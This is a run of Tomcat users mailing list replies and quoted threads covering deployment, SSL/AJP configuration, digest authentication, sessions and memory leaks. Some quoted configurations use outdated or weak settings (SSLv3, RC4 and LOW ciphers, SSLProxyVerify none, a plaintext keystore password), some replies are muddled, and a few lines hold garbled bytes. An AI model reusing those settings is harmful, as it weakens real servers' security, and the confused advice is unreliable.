Johann- If your design supports Comet, Polling or Piggyback you *may* to take a look at Joe Walker's DWR..(Direct Web Remoting) http://directwebremoting.org/dwr/index.html *Mit freundlichen grüßen* Martin -- Date: Thu, 2 Jan 2014 15:54:01 -0800 Subject: Re: Java to JavaScript RMI framework available. From: igor.uris...@gmail.com To: users@tomcat.apache.org Johan, On Thu, Jan 2, 2014 at 1:25 AM, Johan Compagner jcompag...@servoy.comwrote: does it also do the other way around? So also having the endpoint on the server that has methods that can be called from javascript in a very easy way? It doesn't. There is already a mechanism that sits above simple message passing, for calling into the server: XMLHttpRequest, aka AJAX. Competing with that would have taken more thought and effort that so far I have been able to put into FERMI. I imagine that if this gets some acceptance, offering a fully symmetric RMI may become a viable idea. Not on the immediate roadmap, though. -Igor. On 31 December 2013 01:55, Igor Urisman igor.uris...@gmail.com wrote: Folks, I needed to write this for something I am working on and thought there might be a wider audience for it. Tomcat 8 supports standard compliant Websockets, which provide convenient asynchronous full-duplex server to client data transport. The framework I am offering builds on top of that a feature rich remote method invocation paradigm. Please check it out. https://github.com/iurisman/FERMI Apache 2.0 license. Happy coding. Igor. -- Johan Compagner Servoy
RE: Start the Tomcat server in the server view and go to http://localhost:8080/
Frank Context Path / is mapped to 'ROOT' create ROOT.WAR uncompress ROOT.WAR to $CATALINA_HOME/webapps/ROOT then the first and only webapp you see when you go to http://localhost:8080 will be root.war http://www.coderanch.com/t/424290/Tomcat/deploy-Root-Tomcat-Website Buona Fortuna! Martin -- Per favore non modificare o interrompere questa trasmissione From: frank.luga...@amdocs.com To: users@tomcat.apache.org Subject: Start the Tomcat server in the server view and go to http://localhost:8080/ Date: Fri, 27 Dec 2013 19:51:26 + Hi All, I have a very simple question but seems I cant find this optiontried to google several times,!Can someone please tell me how to Start the Tomcat server in the server view and go to http://localhost:8080/? Thank you ~Frank This message and the information contained herein is proprietary and confidential and subject to the Amdocs policy statement, you may review at http://www.amdocs.com/email_disclaimer.asp
RE: V 7 047 windows x64
Date: Thu, 26 Dec 2013 21:24:27 +0100 Subject: Re: V 7 047 windows x64 From: jbmo...@gmail.com To: users@tomcat.apache.org I was testing the EL in a .jsp file under Eclipse Kepler. Now I copied the project files under c:\tomcat7\webapps and recompiled the java sources. And the EL works! So the EL problems are in the Eclipse Kepler setup. MGthen you should contact the support staff at Eclipse to let them know of this significant bug in Kepler Many thanks for your reply. Jean On Thu, Dec 26, 2013 at 3:16 PM, André Warnier a...@ice-sa.com wrote: JB MORLA wrote: Hi, I can't use EL in .jsp files. I have searched the web and sintalled jasper-el.jar and javaee-api 7 0 in the \lib directory, but I keep getting the ELResolver error. Hi. You would have a much higher probability of getting useful and quick help, if you pasted the original corresponding Tomcat error log lines in your message, like here : (Note: really do a cut-and-paste directly in your mail message to the list. Do not attach the error log as attachment. This list strips most attachments). - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: EOFException in AjpNioProcessor
Subject: Re: EOFException in AjpNioProcessor From: jsb_tom...@360works.com Date: Sat, 21 Dec 2013 16:58:07 -0500 To: users@tomcat.apache.org On Dec 18, 2013, at 1:40 PM, André Warnier a...@ice-sa.com wrote: Jesse Barnum wrote: On Dec 18, 2013, at 12:27 PM, Jesse Barnum jsb_tom...@360works.com wrote: I'm seeing this error a lot in my log files. It happens when I am trying to read from the request InputStream. Should I be concerned about this, or is it just the equivalent of the user clicking 'stop' in their browser? SEVERE: An error occurred while handling request /WSMRegister/LicenseCheck/handshake java.io.EOFException Forgot to mention, I'm running version 7.0.35 on Ubuntu Linux on Amazon EC2. Well, it seems that you have the explanation right there. If com.prosc.licensecheck.LicenseCheck.doPost is your code, then that's where the problem is : you are trying to read from the request input stream, when there is no more data to read and you have already seen it's EOF. Why there is no more data to read is another question, and it could be that the client did something wrong. But the code in those classes who do the read, obviously is not coping well with that case. Yes, com.prosc.licensecheck.ListCheck.doPost is my code. It would not be hard to catch the exception there and ignore it. I guess another way to phrase the question is, what would cause a java.io.EOFException to get thrown? I don't want to ignore it if it's trying to tell me something important. I am used to seeing ClientAbortException: java.net.SocketException: Broken pipe. MGError in Transport..your apache or tomcat servers(or one of intervening routers) is unable to complete the transmission Is the EOFException basically the same thing? MGAs andre said There is no more data from Request My concern is that there might be some misconfiguration between the Apache front end and the Tomcat NIO connector that might be causing it. MG..possibly...lets take a look.. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Exception in CoyoteAdapter class
Señor AT Martínpuerto y el protocolo tienen que estar de acuerdo con la configuración del conector AJP en tomcat server.xml MartínEl puerto debe ser 8009 MartínHabilitar el protocolo TLS (pero no SSLv2) http://www.zeitoun.net/articles/configure-mod_proxy_ajp-with-tomcat/start MartínSaludos Cordiales desde Dorchester MA From: at.s...@everis.com To: users@tomcat.apache.org Subject: RE: Exception in CoyoteAdapter class Date: Fri, 20 Dec 2013 08:30:19 + Hi, We are concerned about the issues we found some weeks ago, do you have any suggestions about it? Best Regards, AT -Mensaje original- De: Christopher Schultz [mailto:ch...@christopherschultz.net] Enviado el: lunes, 09 de diciembre de 2013 22:51 Para: Tomcat Users List Asunto: Re: Exception in CoyoteAdapter class -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 AT, On 12/9/13, 6:43 AM, at.silk wrote: 2. What is in front of Tomcat? An Apache HTTPD server? - Right. Is Apache HTTPD accessed via HTTPS? - Right, via HTTPS How mod_jk is configured there? Is mod_jk configured to pass SSL_SESSION_ID to Tomcat? AT: This is our configuration: AllowCONNECT 443 SSLEngine on SSLProxyEngine on SSLProxyVerify none SSLOptions +StdEnvVars +ExportCertData SSLProtocol all -SSLv2 SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:+MEDIUM:+LOW SSLCertificateFile xxx.crt SSLCertificateKeyFile xxx.key ProxyPass / ajp://localhost:8010/ connectiontimeout=3600 timeout=3600 ProxyPassReverse / ajp://localhost:8010/ Note a note: this is a mod_proxy_ajp configuration, not a mod_jk one. I know that mod_jk uses SSLOptions +StdEnvVars to pass the SSL session id to Tomcat, but I'm sorry, I don't know about mod_proxy_ajp. I can imagine that it would operate in a similar way, but the mod_proxy_ajp documentation isn't as forthcoming as the mod_jk documentation. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJSpjtYAAoJEBzwKT+lPKRYbp4P/3xElIVs2K47Y/+ppay3Np/7 TyhYLXIdgUAvapRy6p8KC8okiAxgteNkPPtwxywQqR/LkM0mHeFtN3OFJe1MHl0D qJ3ZoyYEKbe+4bGuUm/SLX7YswSO+0nTsf9OGmi2XVZyCXff0faxZFSZ2N1hW+0y 4+J1eLcG+yHAkaN9JSsSHYx+M9hKoMz4ZXIohnB1zfvD1iroSoBpPPlbdl0BXBaa /b6yNjFfpgqxojiCdP8/eA2/Tdd5+p9aNwUWAYiq3vMME6+oDuYMghQifK1pIbzP ezgF4/IObA8y1Zhavnw2hA3ZjtNcXauzSmF9iTxlDQaEhjVeiAtwAv+yrXyhQB6/ J1pc/1DpVTsA+7j/JEGKhpna8W0G6aJc7iIFoqu5g36bHEoZbNDlnLZDE2kZrSda q1zjIklRhmiA1lEqh8tW4N1ushBgkJpQp2PZx5ZNqsvbrr3djbFHSkXUKgus3VsS czdD7vuhGsHX8ER/c3/KD59TF7IDUcjluJWyQRhoc2P+S0xTtDMTHDLvx4WXwLm1 ZU3+pzR/MAoCI0kesq5NxR4lewyT3n9MW3nD62sO1h9ieqoOuhQ8eRqxSpBTsZZH Sy+GorGhXiZmdr02llagtHrdiexrY84oPzTioIPkQ8/C9TlR7zDaxpPE39HjILkd r8ajstixh1CbE3sC2h1C =hEow -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org B�CB��[��X��ܚX�KK[XZ[�\�\��][��X��ܚX�P�X�] �\X�K�ܙ�B��܈Y][ۘ[��[X[��K[XZ[�\�\��Z[�X�] �\X�K�ܙ�B�
RE: ssl_error_internal_error_alert in tomcat 7
Date: Thu, 19 Dec 2013 15:41:13 -0500 From: ch...@christopherschultz.net To: users@tomcat.apache.org Subject: Re: ssl_error_internal_error_alert in tomcat 7 -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Jaya, On 12/19/13, 2:54 PM, jaya ravindran wrote: I am getting SSL error in firefox when connecting to tomcat server. Apache Tomcat Version 7.0.22 using JSSE configuration You should really upgrade from your 2-year-old version. Tomcat 7 is on version 7.0.47 these days. It's possible something has been fixed. java version 1.6.0_41 using 64 bit . IE and Chrome works fine although I can see the following message in Chrome . The connection users SSL 3.0 When I edit firefox and set security.tls.version.max=0, I can get connection. My ssl config is below. MGsecurity.tls.version.min = 0 (SSL 3.0); Do you have any non-default setting for security.enable_ssl3 or security.enable_tls? Can anyone suggest some possible reasons for this error? Connector port=8443 protocol=org.apache.coyote.http11.Http11Protocol SSLEnabled=true scheme=https secure=true clientAuth=false sslProtocol=TLS keystoreFile=my.keystore MGsslProtocol=SSLv3 keystorePass=acdfv123 truststoreFile=my.keystore truststorePass=acdfv123 connectionTimeout=2 redirectPort=18443 maxThreads=150 maxSpareThreads=75 enableLookups=false acceptCount=100 disableUploadTimeout=true URIEncoding=UTF-8 server=Apache / Can you try using OpenSSL's s_client with various options (for TLS protocol) to see which ones do and do not work? - -chris MGhttps://support.mozilla.org/en-US/questions/963325 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJSs1nnAAoJEBzwKT+lPKRYjaUP/2wwh/XACKSsPtFViWxz+78m aXOos8dB60Sx8czBsFfDsIzFfBdvCOEzmLl5ZlOUi7EyV8F+qwh6mG/x73vUIdrb LcLQlrYUJaDg8XXHMSRa5icATBE3sZQVITgDUUkF1dp0uyUoQmE/HLnZ3HZfIOA3 UQbHb/f7N5CHpb9LQ82YUlSRZ6v+feqsBEg0BPg4tf1x9eHEcf6xPUu6sCdzcdXC 01cpS2/5v8hyo2QmeG6shM+JBJoFAFKLisJrhVuSmFUMWLxqt9MykGlvkf/sfZIQ klSuCbQ74dxYS5OhcP3ipqD3nb7t3C93qRSZBqSGI8PZtWntwEZqTrR+obTxB3CZ H/nzKCupV+9s1NrHNO8q6fQ0UCrPCucwJS6WM9nIEczu5miMxpdb+mj8Qmj6dpYn 3b4IeLn4qfAk9FNGHuiiL4y87uMkR2+617+2L3VI2f/N/E2Y4bf0zeb7Du5UhuGn FxXLRjaNDIPj1yeJHqz7DiuArSv9eZwG1xWAWfBQIVwux+Vm4OCgjph52vGYp2n1 Y7Iht9/xb1qVxw1KUVeU+qevTszBYnf9V2UM6LPxBzZQwuBkXhZwOYIdRPC/CVn6 +U4+xf2/3IDpale2eO/453+0f2Zy7aApPKXPvgoAcy68jYBbxuSpL0gEQk1BIGhV y94bWDTJiTu9AIy0tiyj =KaW9 -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: linking (limiting???)
Date: Sun, 15 Dec 2013 12:41:55 -0800 From: its_toas...@yahoo.com To: users@tomcat.apache.org Subject: Re: linking (limiting???) On 12/15/2013 8:34 AM, Ray Holme wrote: I am a Linux user and love linking things to reduce copies. Apache/Tomcat (by default) does not allow symbolic linking (nice as it can cross mounted file systems) except in the top apache/lib directory. I use hard links in the Application/WEB-INF/lib directories to reduce copying and help me manage things. HOWEVER, some applications have special needs - e.g. pictures. You don't want to always distribute these with the release of the application (Application.war file), so symbolic links are the way to go (except for MS land, sorry). The nice solution to this is: .../webapps/Application/WEB-INF/context.xml which must contain at least the two below lines: ?xml version=1.0 encoding=UTF-8? Context allowLinking=true /Context However this allows ALL symbolic linking in the Application directory. I agree with the developers that this is dangerous. Is there some way to allow linking in just ONE sub-directory of the Application?? - e.g. .../webapps/Application/images This would allow all I need to have local images for the application without endangering other things using a symbolic link. If you use Tomcat 7, read the following: http://tomcat.apache.org/tomcat-7.0-doc/config/context.html#Resource_Definitions MG...Mark I assume you're referring to Virtual DirContext...? Context path=/mywebapp docBase=/Users/theuser/mywebapp/src/main/webapp Resources className=org.apache.naming.resources.VirtualDirContext extraResourcePaths=/WEB-INF/classes=/Users/theuser/mywebapp/target/classes,/pictures=/Users/theuser/mypictures,/movies=/Users/theuser/mymovies/ MG . . . just my two cents /mde/ MGThanks Mark, - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Transfer-Encoding: chunked not working
chunked only works on HTTP 1.1 connections display $CATALINA_HOME/conf/server.xml Martin-- Date: Tue, 3 Dec 2013 15:55:22 -0800 Subject: Transfer-Encoding: chunked not working From: cbman...@gmail.com To: users@tomcat.apache.org Tomcat 7.0.47, OSX 10.8. Fresh install via homebrew. I'm running a web app with Tomcat that is returning the header Transfer-Encoding: chunked and seemingly exactly one 16384-byte chunk of content that is longer than that. Consequently the page that should be transferred is not rendered by the user agent (Chrome in this case). AFAICT it's Tomcat that isn't sending all the chunks properly. Why might it not be doing that? What else might be the problem? -- C. Benson Manica cbman...@gmail.com
RE: Same realm for three different countries
$CATALINA_HOME/srcgrep -S -l locale *Realm*.* ---Nichts--- Im going to take agree with Chris 2 options: 1)Make a 'Enhancement Request' to introduce localisation parameter for JDBCRealm 2)code the localisation parameter into CustomRealm yourself and submit a patch http://tomcat.apache.org/bugreport.html#How_to_submit_patches_and_enhancement_requests Viel Gluck! Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Mon, 2 Dec 2013 23:40:59 +0100 Subject: Re: Same realm for three different countries From: stefan.a.f...@gmail.com To: users@tomcat.apache.org do you see a entry point where to start ? i already have a customRealm 2013/12/2 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Stefani, On 12/2/13, 2:23 PM, Stefan Frei wrote: tomcat 7.0.42 debian I have the same webapplication responsible for providing services fro three different countries. Therefore 3 slightly different database schemes exist on my mysql instance. one for ch(switzerland), one for de(germany) and one for at(austria). now my auth-realm which extends RealmBase should be able to decide to which schema to connect to, depending on the requested url. for example requests to webapp.ch should use the table users in schema ch. how am i able to read out httprequest or session in the realm to identify for which country the request is destined? The short answer is that you can't, at least with Tomcat's stock Realm implementations. You can hack your own Realm, but you'll also need to hack around a bit more, since the Realm itself doesn't get any access to the servlet request information. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJSnQpPAAoJEBzwKT+lPKRYOV0QAJ0ZkCM4eFRrEOX5dbJyXgYK evyIEKju8jd6N3rbOfWx3XKua0Nau0H18Yb6gCrQc94OGyHTJFP1gfPkDL4eTaHu FXQJvWgrNUjHHifXaNmcATef6GeHhchSply6KbP0s8uYjINgS3eGCUJmk6mS0ZU+ W7VMIXE184kaQcOYJ6OIFwFhGkEuMEajRa7iGkWxQYxhi9VCXgb8a0hZ9uLO00rm Nt/J54G2aE32UTNhEti0sBIwJC9pnddsV9WWv84jSBN/FhKNf5fHc7CskpB9wRGR mwSHFhiKpZv60MnswiN9DO2vvCkNBhSE7XSaj/aBsw6aOkxV8w4zE+FbogoFDZZU yDqY/kY4LH5tAfddx+9w7shtLsYlgpC8NjF5KMURuJuhw8TOvd3+vzzRq2gEB2Zs iseOnfGAvwd1EVZacaMgmaCbqCFcsUvAFx2j4/f5CX1CcPOQT4hE7Tu+UCTbIzGA JY3NduFCWR1k9qG07wGtyAP2osz6C9seDYI059Vu5YsOT7V8NpsTROKi+34kMjs4 wI1J3TqYaJ/2WHMKGvH1r8+2LUg7R5PPBuUrQ4eanU5t1fKmzr7f8VDrOtW1PLW/ TYg/R9LfX88+u5/L6LqUomC7+mJ1dkihDmel6yM4bgEna6vV2kbw4ro/CCQWvJOj MlrsH8tRc7Ven339Wj0S =Ps8Q -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: multiple servers and digest authentication
From: cdeha...@ebay.com To: users@tomcat.apache.org CC: cdeha...@ebay.com Subject: Re: multiple servers and digest authentication Date: Sat, 30 Nov 2013 01:55:32 + Hi, Thanks for your answers: 1/ Sticky session : yes, that is the way I have currently set my load balancer. But there is a drawback when the client is contineoulsy using the service = because it will never been load balanced again. The worst is when one of the server is stopped and restarted = all the clients will be redistributed to the still alive servers, And when the server is restarted, it will not picked up any load To work-around this problem, with sticky session on , I have patched my client to clear the sticky cookie every X minutes. That enforces the load balancer to give me the less used servers (possibly the one that have been restarted) 2/ front-end load balancer solution: my configuration is with an F5 load balancer (citrix). From what I understand, the question is : can we configure the F5 to manage the nonce and then delegate the authentication to the servers (tomcat)- . It will require: F5 to manage the nonce (will send back the 401 when nonce not valid) but MG here is the XSD element definition for noonce using wss4j MGxmlns:xenc=http://www.w3.org/2001/04/xmlenc#; MG!-- KANonce -- ObjectProvider qualifiedName=xenc:KA-Nonce BuilderClass className=org.opensaml.xml.encryption.impl.KANonceBuilder / MarshallingClass className=org.opensaml.xml.schema.impl.XSBase64BinaryMarshaller / UnmarshallingClass className=org.opensaml.xml.schema.impl.XSBase64BinaryUnmarshaller / /ObjectProvider MGso How would F5 build out a noonce such as EncryptedData EncryptionMethod Algorithm=Example:Block/Alg KeySize80/KeySize /EncryptionMethod ds:KeyInfo xmlns:ds=http://www.w3.org/2000/09/xmldsig#; AgreementMethod Algorithm=example:Agreement/Algorithm KA-NonceZm9v/KA-Nonce ds:DigestMethod Algorithm=http://www.w3.org/2001/04/xmlenc#sha1/ OriginatorKeyInfo ds:KeyValue/ds:KeyValue /OriginatorKeyInfo RecipientKeyInfo ds:KeyValue/ds:KeyValue /RecipientKeyInfo /AgreementMethod /ds:KeyInfo CipherData.../CipherData MG? not verify the user credential and pass that to servers Servers (tomcat) to not check the nonce but check the credential. I have read the description of tomcatAuthentication flag from André's link, but I'm not sure it does what I expect Any idea if this is feasible from F5/tomcat point of views? Any other suggestions? ;) Thanks, Xtof On 11/27/13 9:04 AM, Christopher Schultz ch...@christopherschultz.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 André, On 11/27/13, 5:15 AM, André Warnier wrote: Mark Thomas wrote: On 27/11/2013 07:34, Dehaudt, Christophe wrote: Is there a way to share the nonce between servers so they can act as one? No. You'd need to customise the DigestAuthenticator to do that. I would like to get your advices , how to make a multiple server deployment running with Http digest. Use sticky load-balancing. Or do the authentication at the front-end load-balancer level, and set Tomcat's authentication to accept what the front-end says ? (E.g. https://tomcat.apache.org/tomcat-8.0-doc/config/ajp.html#Standard_Impleme ntations #tomcatAuthentication) While it is popular to do so, I don't think anyone really uses httpd for industrial-strength load-balancing. Can an F5 do authentication (and forward it to Tomcat?). I suspect not in any way that would work well with the back-end application. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Patch information required
I will contact all the engineers i know who want to work free for Accenture Auf 'Wiedersehn __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. From: kanishk.se...@accenture.com To: users@tomcat.apache.org CC: pravin.pa...@accenture.com Subject: Patch information required Date: Thu, 28 Nov 2013 06:15:27 + Hi All, We are using Apache tomcat version 6.0.26 and we need to install below patches on our servers to fix some Vulnerabilities. http://svn.apache.org/viewvc?view=revisionrevision=958911 http://svn.apache.org/viewvc?view=revisionrevision=958977 http://svn.apache.org/viewvc?view=revisionrevision=959428 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03298151 http://www.juniper.net/alerts/viewalert.jsp?txtAlertNumber=PSN-2012-05-584actionBtn=Search I am not sure how to install these patches can anyone help us here. Regards Kanishk Sethi This message is for the designated recipient only and may contain privileged, proprietary, or otherwise confidential information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the e-mail by you is prohibited. Where allowed by local law, electronic communications with Accenture and its affiliates, including e-mail and instant messaging (including content), may be scanned by our systems for the purposes of information security and assessment of internal compliance with Accenture policy. . __ www.accenture.com
Felix plugin for Tomcat?
All- Is/are there any efforts to integrate Apache Felix OSGI Console Functions (as a TC plugin) into either Tomcat 7.x or Tomcat 8x? http://felix.apache.org/ Thanks, Martin
RE: PersistentManager + JdbcStore
..Quizas.. http://kickjava.com/src/com/lutris/appserver/server/sessionContainerAdapter/JmxContainerAdapterSessionManager.java.htm (Installar como agente JMX) Saludos Cordiales Martin __ Porfavor..no altere ni interrumpir esta communication...Gracias Date: Sat, 9 Nov 2013 16:07:42 -0300 Subject: Re: PersistentManager + JdbcStore From: jbig1...@gmail.com To: users@tomcat.apache.org Thanks for this post, but the problem that I have is uncertain. My application is Java Web and creates a session for the user in Tomcat (version apache-tomcat-7.0.29) and an unusual one user captures the user session without finding an explanation. Could you help me or tell me who to contact to find out how Tomcat creates and validates sessions created and if possible capture the session of another user from different computers. Best Regards 2013/11/9 spr...@gmx.eu I think I will fix the DynamoDB-Sessionmanager. Also an option. Already in process it seems ;) https://github.com/aws/aws-dynamodb-session-tomcat/issues/3 I hope they will use the code from tomcat for managing the classloader issues. Well, just realized that this Manager is based on PersistentManagerBase. So I see no improvement in terms of reliability, because it still writes the data async into DynamoDB. I even cannot see the reason why they created DynamoDBSessionManager, DynamoDBSessionStore would have done the job too then. Looking into the Manager interface (public void backgroundProcess()) tells me, that it seems to be always async? So what is the right stategy to distribute sessions across an arbitrary amount of servers with a 100% guarantee that the session will be found at any time on any server? Thank you - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Bin Folders
to hammer home what Jordan is saying: sh/cmd/bat files are usually based on environment variables e.g. CATALINA_BASE to the exact location of the specific TOMCAT Instance you are running CATALINA_HOME to the exact location of the folder where TOMCAT was installed assuming you have set unique service_name for each service http://grokbase.com/t/tomcat/users/1351gyqtgb/multiple-tomcat-containers-or-instance-on-same-servers if memory serves there is a SC query TomcatServiceName which should display details for each TOMCAT service services.msc at run command provides the same info If CATALINA_BASE changes you will need to uninstall and reinstall to make sure the registry has a clean configuration for the TC instance I'll defer to Jordan, Dave and others to guide you thru that process.. Date: Wed, 6 Nov 2013 10:39:13 -0800 From: jor...@viviotech.net To: users@tomcat.apache.org Subject: Re: Bin Folders Have you made changes that you want to keep? In my experience the installer script and exe's are fairly well removed from the other files in the bin folder. Unless you've made specific changes to files that you want to keep, I don't see the point of what you're doing. If you *have* made changes, why not just copy the files you've changed and leave it at that? Make life easier on yourself. ;) Warm Regards, Jordan Michaels On 11/06/2013 10:29 AM, Crystal Maramba wrote: I will as soon as I combine the bin folders. The service installer does not include the scripts which is what I need from the first install. Would you know if there will be any issues with the rest of the folders? -Original Message- From: Jordan Michaels [mailto:jor...@viviotech.net] Sent: Wednesday, November 06, 2013 10:25 AM To: Tomcat Users List Subject: Re: Bin Folders From my experience, no; there should not be an issue with that. Why not just get rid of the first install if you're not going to use it? Keep your system clean and less confusing. Warm Regards, Jordan Michaels On 11/06/2013 09:34 AM, Crystal Maramba wrote: Tomcat version: 7.0.42 Operating System: Server 2008 x64 (Standard) Question: I have two Tomcat File Directories: 1) Windows service installer location: \Program Files\Apache Software Foundation\Tomcat 7.0 2) Base distribution location: \Program Files\Apache\Tomcat 7.0 (this did not include the windows service wrapper) Item 1) was installed after the 2) base distribution location was already configured but we needed to use the 1) windows service installer. Can I combine the files (.bat scripts) from the bin folders so that all the files with the bin folder in location 2) is in location 1)? Will there be an issue to do this? - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Fix your web application so it can cleanly un-deploy and re-deploy - how?
Springs over-use of CGLib for Interfaces is a memory consumer Retask CGLib Proxy to JDKProxy to create your Impl classes for @Before advised methods proxyTargetClass: false Similarly using JavaAssist with Hibernate reduced memory footprint over CGLib significantly http://docs.spring.io/spring/docs/3.0.0.M4/reference/html/ch08s05.html http://what-when-how.com/Tutorial/SpringFramework3/SpringFramework300224.html Dale: How did Mattias Jiderhamn's library help? Martin Subject: Fix your web application so it can cleanly un-deploy and re-deploy - how? Date: Thu, 7 Nov 2013 11:50:03 +1300 From: dale_ogil...@trimble.com To: users@tomcat.apache.org Chris made the following good suggestion in another thread: Can I make a suggestion? Fix your web application so it can cleanly un-deploy and re-deploy and then simply do a hot deployment? I've been down this track with our own Spring web apps and found it to be quite a deep rabbit hole where a number of 3rd party libs are used. We get the issue where the webapp classloader is not GC'ed due to classes in the libraries we use not being terminated cleanly. Which means we get a big permgen memory leak when we redeploy the app. The occasional tomcat restart workaround is effective, if nasty. I did what Chris suggested for one of our apps and I think I got to 3rd party library problem number FIVE (an oracle jdbc driver connection timer) before I gave up in disgust. As I recall undisposed thread locals were a common theme. I used various strategies to resolve the prior issues in things as simple as logging frameworks, JMS queuing libraries, underlying http client code etc. Strategies such as: 1. Specifically calling a low level library finalization routine in a context listener or Spring lifecycle bean 2. Updating the 3rd party library to a later version which fixed the leak 3. Including Mattias Jiderhamn's active leak prevention library I would so love it if Tomcat could just throw away the entire webapp memory footprint on undeploy... Tomcat 7x memory leak protection wasn't good enough for our app a few months ago. Or failing that, if anyone can share successful strategies for Fixing your web application so it can cleanly un-deploy and re-deploy please do. Dale Ref: http://wiki.apache.org/tomcat/MemoryLeakProtection Ref: https://github.com/mjiderhamn/classloader-leak-prevention -Original Message- From: Christopher Schultz [mailto:ch...@christopherschultz.net] Sent: Thursday, 7 November 2013 10:44 a.m. To: Tomcat Users List Subject: Re: how to bounce tomcat remote? snip Can I make a suggestion? Fix your web application so it can cleanly un-deploy and re-deploy and then simply do a hot deployment? snip B�CB��[��X��ܚX�KK[XZ[�\�\��][��X��ܚX�P�X�] �\X�K�ܙ�B��܈Y][ۘ[��[X[��K[XZ[�\�\��Z[�X�] �\X�K�ܙ�B�
RE: Secure Tomcat With SSL
For over a year I've been looking for a tool to show the RFC 822 name and the PEM Thanks craig! Martin Date: Mon, 28 Oct 2013 16:43:53 -0400 Subject: Re: Secure Tomcat With SSL From: craig.tay...@drivedominion.com To: users@tomcat.apache.org This tool has saved me a few times over: http://sourceforge.net/projects/portecle/ On Mon, Oct 28, 2013 at 4:41 PM, Ognjen Blagojevic ognjen.d.blagoje...@gmail.com wrote: Chris, Leo, On 28.10.2013 18:23, Leo Donahue - OETX wrote: I've been having some trouble lately converting keys and certs from OpenSSL format into Java's JKS format. I follow all of the magical incantations I can find online to convert key+cert into a Java keystore but I get no love. Is there a decent guide anywhere for how to do this? From my book of spells. Used this to configure SSL in Apache httpd for subversion edge. openssl pkcs12 -export -in C:/server.crt -inkey C:/server.key -name svnedge -out C:/server.p12 keytool -importkeystore -srckeystore C:/server.p12 -srcstoretype PKCS12 -destkeystore C:/svnedge.jks During TLS handshake, server may respond with complete certificate chain (server certificate with all intermediate certificates) or with incomplete certificate chain (e.g. server certificate, without any/some intermediate certificates). Most servers, around 88% of them, deliver full certificate chain, according to research mentioned here [1]. Complete certificate chain is being recognized as valid by every client that implements TLS (assuming that root CA certificate is in the client keystore). Incomplete certificate chain may be recognized as valid by some TLS clients (e.g. Internet Explorer), using information from X.509v3 extension called Authority Information Access (AIA), or using previously validated certificate chains. Some clients will not recognize incomplete certificate chain as valid (e.g. openssl or Apache HTTPCommons Client). Even the same client may sometimes recognize incomplete certificate chains as valid and sometimes as invalid, thanks to caching of intermediate certificates. Therefore, it is best practice always to deliver complete certificate chain to the client. Having root CA certificate in the chain is unnecessary, as it wastes your bandwidth during TLS handshake (your client already have root CA certificate in its own keystore). Assuming that intermediate certificates (intermediates.pem), server certificate (server.pem) and private key (server.key) are all in PEM format, you need to add option -certfile to command Leo provided: openssl pkcs12 -export -out keystore.p12 -name myserver -in 